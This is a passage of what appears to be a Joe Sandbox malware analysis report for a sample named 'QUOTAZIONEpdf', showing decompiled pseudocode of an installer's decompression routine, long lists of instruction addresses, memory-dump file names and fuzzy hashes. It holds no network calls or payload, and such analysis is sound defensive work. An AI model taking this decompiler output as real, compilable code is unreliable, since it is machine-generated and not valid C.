											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}













                0x00000000
                0x00406355
                0x00406355
                0x00406359
                0x00406382
                0x0040638c
                0x0040635b
                0x00406364
                0x00406371
                0x00406374
                0x004066b8
                0x004066b8
                0x004066bb
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x00000000
                0x00000000
                0x00406709
                0x0040670d
                0x004068bc
                0x004068d2
                0x004068da
                0x004068e1
                0x004068e3
                0x004068ea
                0x004068ee
                0x004068ee
                0x00406719
                0x00406720
                0x00406728
                0x0040672b
                0x0040672e
                0x0040672e
                0x00406734
                0x00406734
                0x00405ed0
                0x00405ed0
                0x00405ed0
                0x00405ed9
                0x00000000
                0x00000000
                0x00405edf
                0x00000000
                0x00405eea
                0x00000000
                0x00000000
                0x00405ef3
                0x00405ef6
                0x00405ef9
                0x00405efd
                0x00000000
                0x00000000
                0x00405f03
                0x00405f06
                0x00405f08
                0x00405f09
                0x00405f0c
                0x00405f0e
                0x00405f0f
                0x00405f11
                0x00405f14
                0x00405f19
                0x00405f1e
                0x00405f27
                0x00405f3a
                0x00405f3d
                0x00405f49
                0x00405f71
                0x00405f73
                0x00405f81
                0x00405f81
                0x00405f85
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405f75
                0x00405f75
                0x00405f78
                0x00405f79
                0x00405f79
                0x00000000
                0x00405f75
                0x00405f4f
                0x00405f54
                0x00405f54
                0x00405f5d
                0x00405f65
                0x00405f68
                0x00000000
                0x00405f6e
                0x00405f6e
                0x00000000
                0x00405f6e
                0x00000000
                0x00405f8b
                0x00405f8b
                0x00405f8f
                0x0040683b
                0x00000000
                0x0040683b
                0x00405f98
                0x00405fa8
                0x00405fab
                0x00405fae
                0x00405fae
                0x00405fae
                0x00405fb1
                0x00405fb5
                0x00000000
                0x00000000
                0x00405fb7
                0x00405fbd
                0x00405fe7
                0x00405fed
                0x00405ff4
                0x00000000
                0x00405ff4
                0x00405fc3
                0x00405fc6
                0x00405fcb
                0x00405fcb
                0x00405fd6
                0x00405fde
                0x00405fe1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406026
                0x0040602c
                0x0040602f
                0x0040603c
                0x00406044
                0x004066b8
                0x00000000
                0x00000000
                0x00405ffb
                0x00405ffb
                0x00405fff
                0x0040684a
                0x00000000
                0x0040684a
                0x0040600b
                0x00406016
                0x00406016
                0x00406016
                0x00406019
                0x0040601c
                0x0040601f
                0x00406024
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040604c
                0x0040604e
                0x00406051
                0x004060c2
                0x004060c5
                0x004060c8
                0x004060cf
                0x004060d9
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x004066b8
                0x00406053
                0x00406057
                0x0040605a
                0x0040605c
                0x0040605f
                0x00406062
                0x00406064
                0x00406067
                0x00406069
                0x0040606e
                0x00406071
                0x00406074
                0x00406078
                0x0040607f
                0x00406082
                0x00406089
                0x0040608d
                0x00406095
                0x00406095
                0x00406095
                0x0040608f
                0x0040608f
                0x0040608f
                0x00406084
                0x00406084
                0x00406084
                0x00406099
                0x0040609c
                0x004060ba
                0x004060bc
                0x00000000
                0x0040609e
                0x0040609e
                0x004060a1
                0x004060a4
                0x004060a7
                0x004060a9
                0x004060a9
                0x004060a9
                0x004060ac
                0x004060af
                0x004060b1
                0x004060b2
                0x004060b5
                0x00000000
                0x004060b5
                0x00000000
                0x004062eb
                0x004062ef
                0x0040630d
                0x00406310
                0x00406317
                0x0040631a
                0x0040631d
                0x00406320
                0x00406323
                0x00406326
                0x00406328
                0x0040632f
                0x00406330
                0x00406332
                0x00406335
                0x00406338
                0x0040633b
                0x0040633b
                0x00406340
                0x00000000
                0x00406340
                0x004062f1
                0x004062f4
                0x004062f7
                0x00406301
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00000000
                0x00000000
                0x00000000
                0x00406398
                0x0040639c
                0x00000000
                0x00000000
                0x004063a2
                0x004063a6
                0x00000000
                0x00000000
                0x004063ac
                0x004063ae
                0x004063b2
                0x004063b2
                0x004063b5
                0x004063b9
                0x00000000
                0x00000000
                0x00406409
                0x0040640d
                0x00406414
                0x00406417
                0x0040641a
                0x00406424
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x004066b8
                0x0040640f
                0x00000000
                0x00000000
                0x00406430
                0x00406434
                0x0040643b
                0x0040643e
                0x00406441
                0x00406436
                0x00406436
                0x00406436
                0x00406444
                0x00406447
                0x0040644a
                0x0040644a
                0x0040644d
                0x00406450
                0x00406453
                0x00406453
                0x00406456
                0x0040645d
                0x00406462
                0x00000000
                0x00000000
                0x004064f0
                0x004064f0
                0x004064f4
                0x00406892
                0x00000000
                0x00406892
                0x004064fa
                0x004064fd
                0x00406500
                0x00406504
                0x00406507
                0x0040650d
                0x0040650f
                0x0040650f
                0x0040650f
                0x00406512
                0x00406515
                0x00000000
                0x00000000
                0x004060e5
                0x004060e5
                0x004060e9
                0x00406856
                0x00000000
                0x00406856
                0x004060ef
                0x004060f2
                0x004060f5
                0x004060f9
                0x004060fc
                0x00406102
                0x00406104
                0x00406104
                0x00406104
                0x00406107
                0x0040610a
                0x0040610a
                0x0040610d
                0x00406110
                0x00000000
                0x00000000
                0x00406116
                0x0040611c
                0x00000000
                0x00000000
                0x00406122
                0x00406122
                0x00406126
                0x00406129
                0x0040612c
                0x0040612f
                0x00406132
                0x00406133
                0x00406136
                0x00406138
                0x0040613e
                0x00406141
                0x00406144
                0x00406147
                0x0040614a
                0x0040614d
                0x00406150
                0x0040616c
                0x0040616f
                0x00406172
                0x00406175
                0x0040617c
                0x00406180
                0x00406182
                0x00406186
                0x00406152
                0x00406152
                0x00406156
                0x0040615e
                0x00406163
                0x00406165
                0x00406167
                0x00406167
                0x00406189
                0x00406190
                0x00406193
                0x00000000
                0x00406199
                0x00000000
                0x00406199
                0x00000000
                0x0040619e
                0x0040619e
                0x004061a2
                0x00406862
                0x00000000
                0x00406862
                0x004061a8
                0x004061ab
                0x004061ae
                0x004061b2
                0x004061b5
                0x004061bb
                0x004061bd
                0x004061bd
                0x004061bd
                0x004061c0
                0x004061c3
                0x004061c3
                0x004061c3
                0x004061c9
                0x00000000
                0x00000000
                0x004061cb
                0x004061ce
                0x004061d1
                0x004061d4
                0x004061d7
                0x004061da
                0x004061dd
                0x004061e0
                0x004061e3
                0x004061e6
                0x004061e9
                0x00406201
                0x00406204
                0x00406207
                0x0040620a
                0x0040620a
                0x0040620d
                0x00406211
                0x00406213
                0x004061eb
                0x004061eb
                0x004061f3
                0x004061f8
                0x004061fa
                0x004061fc
                0x004061fc
                0x00406216
                0x0040621d
                0x00406220
                0x00000000
                0x00406222
                0x00000000
                0x00406222
                0x00406220
                0x00406227
                0x00406227
                0x00406227
                0x00406227
                0x00000000
                0x00000000
                0x00406262
                0x00406262
                0x00406266
                0x0040686e
                0x00000000
                0x0040686e
                0x0040626c
                0x0040626f
                0x00406272
                0x00406276
                0x00406279
                0x0040627f
                0x00406281
                0x00406281
                0x00406281
                0x00406284
                0x00406287
                0x00406287
                0x0040628d
                0x0040622b
                0x0040622b
                0x0040622e
                0x00000000
                0x0040622e
                0x0040628f
                0x0040628f
                0x00406292
                0x00406295
                0x00406298
                0x0040629b
                0x0040629e
                0x004062a1
                0x004062a4
                0x004062a7
                0x004062aa
                0x004062ad
                0x004062c5
                0x004062c8
                0x004062cb
                0x004062ce
                0x004062ce
                0x004062d1
                0x004062d5
                0x004062d7
                0x004062af
                0x004062af
                0x004062b7
                0x004062bc
                0x004062be
                0x004062c0
                0x004062c0
                0x004062da
                0x004062e1
                0x004062e4
                0x00000000
                0x004062e6
                0x00000000
                0x004062e6
                0x00000000
                0x00406573
                0x00406573
                0x00406577
                0x0040689e
                0x00000000
                0x0040689e
                0x0040657d
                0x00406580
                0x00406583
                0x00406587
                0x0040658a
                0x00406590
                0x00406592
                0x00406592
                0x00406592
                0x00406595
                0x00000000
                0x00000000
                0x00406343
                0x00406343
                0x00406346
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00000000
                0x00406682
                0x00406686
                0x004066a8
                0x004066ab
                0x004066b5
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x004066b8
                0x00406688
                0x0040668b
                0x0040668f
                0x00406692
                0x00406692
                0x00406695
                0x00000000
                0x00000000
                0x0040673f
                0x00406743
                0x00406761
                0x00406761
                0x00406761
                0x00406768
                0x0040676f
                0x00406776
                0x00406776
                0x00000000
                0x00406776
                0x00406745
                0x00406748
                0x0040674b
                0x0040674e
                0x00406755
                0x00406699
                0x00406699
                0x0040669c
                0x00000000
                0x00000000
                0x00406830
                0x00406833
                0x00406734
                0x00000000
                0x00000000
                0x0040646a
                0x0040646c
                0x00406473
                0x00406474
                0x00406476
                0x00406479
                0x00000000
                0x00000000
                0x00406481
                0x00406484
                0x00406487
                0x00406489
                0x0040648b
                0x0040648b
                0x0040648c
                0x0040648f
                0x00406496
                0x00406499
                0x004064a7
                0x00000000
                0x00000000
                0x0040677d
                0x0040677d
                0x00406780
                0x00406787
                0x00000000
                0x00000000
                0x0040678c
                0x0040678c
                0x00406790
                0x004068c8
                0x00000000
                0x004068c8
                0x00406796
                0x00406799
                0x0040679c
                0x004067a0
                0x004067a3
                0x004067a9
                0x004067ab
                0x004067ab
                0x004067ab
                0x004067ae
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b1
                0x004067b4
                0x004067b4
                0x004067b8
                0x00406818
                0x0040681b
                0x00406820
                0x00406821
                0x00406823
                0x00406825
                0x00406828
                0x00406734
                0x00406734
                0x00000000
                0x0040673a
                0x00406734
                0x004067ba
                0x004067c0
                0x004067c3
                0x004067c6
                0x004067c9
                0x004067cc
                0x004067cf
                0x004067d2
                0x004067d5
                0x004067d8
                0x004067db
                0x004067f4
                0x004067f7
                0x004067fa
                0x004067fd
                0x00406801
                0x00406803
                0x00406803
                0x00406804
                0x00406807
                0x004067dd
                0x004067dd
                0x004067e5
                0x004067ea
                0x004067ec
                0x004067ef
                0x004067ef
                0x0040680a
                0x00406811
                0x00000000
                0x00406813
                0x00000000
                0x00406813
                0x00000000
                0x004064af
                0x004064b2
                0x004064e8
                0x00406618
                0x00406618
                0x00406618
                0x00406618
                0x0040661b
                0x0040661b
                0x0040661e
                0x00406620
                0x004068aa
                0x00000000
                0x004068aa
                0x00406626
                0x00406629
                0x00000000
                0x00000000
                0x0040662f
                0x00406633
                0x00406636
                0x00406636
                0x00406636
                0x00000000
                0x00406636
                0x004064b4
                0x004064b6
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064be
                0x004064c0
                0x004064c2
                0x004064c5
                0x004064c8
                0x004064de
                0x004064e3
                0x0040651b
                0x0040651b
                0x0040651f
                0x0040654b
                0x0040654d
                0x00406554
                0x00406557
                0x0040655a
                0x0040655a
                0x0040655f
                0x0040655f
                0x00406561
                0x00406564
                0x0040656b
                0x0040656e
                0x0040659b
                0x0040659b
                0x0040659e
                0x004065a1
                0x00406615
                0x00406615
                0x00406615
                0x00000000
                0x00406615
                0x004065a3
                0x004065a9
                0x004065ac
                0x004065af
                0x004065b2
                0x004065b5
                0x004065b8
                0x004065bb
                0x004065be
                0x004065c1
                0x004065c4
                0x004065dd
                0x004065df
                0x004065e2
                0x004065e3
                0x004065e6
                0x004065e8
                0x004065eb
                0x004065ed
                0x004065ef
                0x004065f2
                0x004065f4
                0x004065f7
                0x004065fb
                0x004065fd
                0x004065fd
                0x004065fe
                0x00406601
                0x00406604
                0x004065c6
                0x004065c6
                0x004065ce
                0x004065d3
                0x004065d5
                0x004065d8
                0x004065d8
                0x00406607
                0x0040660e
                0x00406598
                0x00406598
                0x00406598
                0x00406598
                0x00000000
                0x00406610
                0x00000000
                0x00406610
                0x0040660e
                0x00406521
                0x00406524
                0x00406526
                0x00406529
                0x0040652c
                0x0040652f
                0x00406531
                0x00406534
                0x00406537
                0x00406537
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406544
                0x00406518
                0x00406518
                0x00406518
                0x00406518
                0x00000000
                0x00406546
                0x00000000
                0x00406546
                0x00406544
                0x004064ca
                0x004064cd
                0x004064cf
                0x004064d2
                0x00000000
                0x00000000
                0x00406231
                0x00406231
                0x00406235
                0x0040687a
                0x00000000
                0x0040687a
                0x0040623b
                0x0040623e
                0x00406241
                0x00406244
                0x00406247
                0x0040624a
                0x0040624d
                0x0040624f
                0x00406252
                0x00406255
                0x00406258
                0x0040625a
                0x0040625a
                0x0040625a
                0x00000000
                0x00000000
                0x004063bc
                0x004063bc
                0x004063c0
                0x00406886
                0x00000000
                0x00406886
                0x004063c6
                0x004063c9
                0x004063cc
                0x004063cf
                0x004063d1
                0x004063d1
                0x004063d1
                0x004063d4
                0x004063d7
                0x004063da
                0x004063dd
                0x004063e0
                0x004063e3
                0x004063e4
                0x004063e6
                0x004063e6
                0x004063e6
                0x004063e9
                0x004063ec
                0x004063ef
                0x004063f2
                0x004063f2
                0x004063f2
                0x004063f5
                0x004063f7
                0x004063f7
                0x00000000
                0x00000000
                0x00406639
                0x00406639
                0x00406639
                0x0040663d
                0x00000000
                0x00000000
                0x00406643
                0x00406646
                0x00406649
                0x0040664c
                0x0040664e
                0x0040664e
                0x0040664e
                0x00406651
                0x00406654
                0x00406657
                0x0040665a
                0x0040665d
                0x00406660
                0x00406661
                0x00406663
                0x00406663
                0x00406663
                0x00406666
                0x00406669
                0x0040666c
                0x0040666f
                0x00406672
                0x00406676
                0x00406678
                0x0040667b
                0x00000000
                0x0040667d
                0x004063fa
                0x004063fa
                0x00000000
                0x004063fa
                0x0040667b
                0x004068b0
                0x00000000
                0x00000000
                0x00405edf
                0x004068e7
                0x004068e7
                0x00000000
                0x004068e7
                0x00406734
                0x004066bb
                0x004066b8

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                Download Yara Rule
                C-Code - Quality: 69%
                			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x423ed0;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42368c =  *0x42368c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
					}
				}
				return 0;
			}











                0x0040138a
                0x004013fa
                0x0040139b
                0x004013a0
                0x00000000
                0x00000000
                0x004013a2
                0x004013a3
                0x004013ad
                0x00000000
                0x00401404
                0x004013b0
                0x004013b7
                0x004013bd
                0x004013be
                0x004013c0
